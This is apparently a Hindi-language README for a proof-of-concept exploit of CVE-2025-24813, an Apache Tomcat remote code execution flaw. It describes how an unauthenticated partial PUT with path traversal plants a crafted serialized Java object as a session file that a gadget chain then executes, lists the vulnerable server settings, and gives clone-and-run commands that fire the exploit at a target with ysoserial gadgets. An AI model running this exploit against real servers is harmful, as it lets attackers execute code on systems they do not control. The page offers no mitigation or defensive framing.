
CVE-2025-24813 - सत्र डिसेरिएलाइज़ेशन के माध्यम से Apache Tomcat RCE - PoC शोषण

Apache Tomcat - सत्र डिसीरियलाइजेशन के माध्यम से दूरस्थ कोड निष्पादन
अप्रमाणित आंशिक PUT + पथ ट्रैवर्सल + गैजेट-संचालित डिसीरियलाइजेशन
Apache Tomcat इंस्टेंस जिनमें डिफ़ॉल्ट सर्वलेट PUT सक्षम है (readonly=false), HTTP PUT अनुरोधों के माध्यम से फ़ाइलें लिखने की अनुमति देते हैं। अपलोड निर्देशिका से FileStore सत्र भंडारण स्थान तक पथ ट्रैवर्सल करने वाले पथ को तैयार करके, एक हमलावर एक निर्मित सीरियलाइज्ड Java ऑब्जेक्ट को .session फ़ाइल के रूप में रोप सकता है। इस सत्र को संदर्भित करने वाला अगला अनुरोध डिसीरियलाइजेशन को ट्रिगर करता है, जिससे एम्बेडेड गैजेट चेन निष्पादित होती है।
conf/web.xml में डिफ़ॉल्ट सर्वलेट readonly=falseMETA-INF/context.xml में org.apache.catalina.session.PersistentManager जिसमें कॉन्फ़िगर किया गया होFileStoreorg.apache.commons.collections.enableUnsafeSerialization=true (या commons-collections < 3.2.2)PUT और पथ ट्रैवर्सल को फ़िल्टर नहीं किया गया होgit clone https://github.com/yuzuki-ayanami/CVE-2025-24813
cd CVE-2025-24813
pip install -r requirements.txt
python cve-2025-24813.py http://target:8080 --ysoserial ysoserial.jar -c 'id'
python cve-2025-24813.py http://target:8080 --ysoserial ysoserial.jar -c 'whoami' --gadget CommonsCollections7